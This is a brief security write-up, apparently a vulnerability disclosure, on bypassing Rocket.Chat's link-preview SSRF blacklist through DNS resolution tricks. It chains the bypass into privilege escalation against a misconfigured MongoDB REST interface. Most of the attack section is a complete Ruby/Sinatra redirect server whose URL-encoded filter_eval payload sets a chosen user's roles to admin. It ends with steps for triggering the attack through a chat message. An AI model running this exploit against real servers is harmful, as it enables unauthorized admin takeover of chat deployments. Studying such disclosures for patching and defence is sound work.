Rocket.Chat SSRF in links preview and privilege escalation via misconfigured MongoDB

SSRF - bypassing blacklist

Despite the introduction of a blacklist (https://github.com/RocketChat/Rocket.Chat/issues/1990) for link previews, it was still possible to supply a domain that resolves to a prohibited address, e.g. by pointing your own domain at it or by using a service like http://xip.io. The check looked at the hostname, not at the address the hostname resolves to.

Privilege escalation via misconfigured MongoDB

```ruby
# sudo ruby redirect.rb 80
require 'rubygems'
require 'sinatra'
require 'uri'

set :bind, '0.0.0.0'
set :port, 80

# Redirect every request to the MongoDB HTTP interface on the internal address.
get '/*' do
  redirect to("http://172.17.0.2:28017/"+payload)
end

def payload
  grant_user = 'test'
  grant_role = 'admin'
  URI.escape("rocketchat/$cmd/?filter_eval=function(){val=db.users.update({'name':'#{grant_user}'},{$set:{'roles':['#{grant_role}']}});return val;}&limit=1")
end
```

Point your domain at the server running redirect.rb, then send a message containing the matching URL to perform the attack:

This affects MongoDB instances with the HTTP interface enabled (the --rest argument); it has not been enabled by default since 1.4.